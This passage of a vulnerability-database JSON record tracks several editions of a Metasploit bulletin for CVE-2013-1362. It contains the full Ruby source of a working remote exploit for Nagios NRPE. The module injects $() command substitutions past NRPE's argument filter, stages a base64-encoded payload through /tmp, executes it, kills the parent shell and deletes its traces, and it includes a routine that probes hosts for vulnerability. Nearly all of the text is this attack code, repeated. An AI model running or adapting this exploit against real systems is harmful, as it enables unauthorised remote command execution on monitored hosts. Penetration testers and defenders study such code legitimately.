NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-03-19T21:56:07", "differentElements": ["modified", "published"], "edition": 53}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-03-22T21:45:17", "history": [], "viewCount": 82, "enchantments": {"score": {"value": 3.3, "modified": "2018-03-22T21:45:17", "vector": "AV:N/AC:L/Au:M/C:N/I:N/A:P/"}}, "objectVersion": "1.4", "metasploitReliability": "Excellent", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-03-22T21:45:17", "differentElements": ["modified", "published"], "edition": 54}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "2013-03-19T08:43:46", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-03-23T07:53:05", "history": [], "viewCount": 82, "enchantments": {"score": {"value": 3.3, "modified": "2018-03-23T07:53:05", "vector": "AV:N/AC:L/Au:M/C:N/I:N/A:P/"}}, "objectVersion": "1.4", "metasploitReliability": "Excellent", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-03-23T07:53:05", "differentElements": ["modified", "published"], "edition": 55}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-03-23T11:50:59", "history": [], "viewCount": 82, "enchantments": {"score": {"value": 3.3, "modified": "2018-03-23T11:50:59", "vector": "AV:N/AC:L/Au:M/C:N/I:N/A:P/"}}, "objectVersion": "1.4", "metasploitReliability": "Excellent", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-03-23T11:50:59", "differentElements": ["modified", "published"], "edition": 56}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "2013-03-19T08:43:46", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-03-23T13:51:05", "history": [], "viewCount": 84, "enchantments": {"score": {"value": 3.3, "modified": "2018-03-23T13:51:05", "vector": "AV:N/AC:L/Au:M/C:N/I:N/A:P/"}}, "objectVersion": "1.4", "metasploitReliability": "Excellent", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on 